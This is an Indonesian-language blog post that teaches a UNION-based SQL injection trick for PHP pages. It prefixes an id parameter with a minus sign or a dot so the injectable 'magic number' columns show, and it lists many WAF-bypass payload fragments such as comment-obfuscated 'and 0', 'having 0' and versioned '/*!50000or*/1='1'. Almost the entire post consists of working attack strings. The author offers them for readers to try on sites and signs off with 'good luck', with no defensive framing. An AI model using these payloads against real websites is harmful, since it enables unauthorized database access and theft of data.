saya awalnya nemu sih dari artikel luar negeri , masih jarang yang tau kayaknya , sudah saya riset juga bnyak yang berhasil jadi saya re share di blog eheheh , langsung aja di coba
simple nya kayak gini,
di bagian sebelum number nya di beri parameter minus ( - ) atau bisa juga memakai parameter titik ( . )
index.php?id=1'+union+select+1,2,3--+- [ tidak muncul magic number ]
index.php?id=-1'+union+select+1,2,3--+- [ muncul magic number ]
index.php?id=.1'+union+select+1,2,3--+- [ muncul magic number ]
jika masih tidak muncul bisa di tambahin parameter di bawah ini , di tambahkan sebelum +union+select
contohnya
index.php?id=.1'+union+select+1,2,3--+- [ tidak muncul magic number ]
index.php?id=.1'+and+0+union+select+1,2,3--+- [ muncul magic number ]
index.php?id=.1'+and+0+union+select+1,2,3--+- [ muncul magic number ]
dan beberapa parameter di bawah ini bisa di coba
and/**/0/**/
and/**_**/0/**_**/
and+false
and/**/false/**/
and/**_**/false/**_**/
div+0
/*!and/+1=0
and(1)=(0)
/*!aND*/+1+like+0
+and+2>3+
and+(1)!=(0)
having+0
having+1=0
and+1=0
limit 0
" and '1'='1
" and (1)=(1
where 1 /*!=*/ 2
and 2>3
/*!50000or*/1='1'
/*!or*/1='1
semoga beruntung.
Share This :
comment 0 komentar
more_vert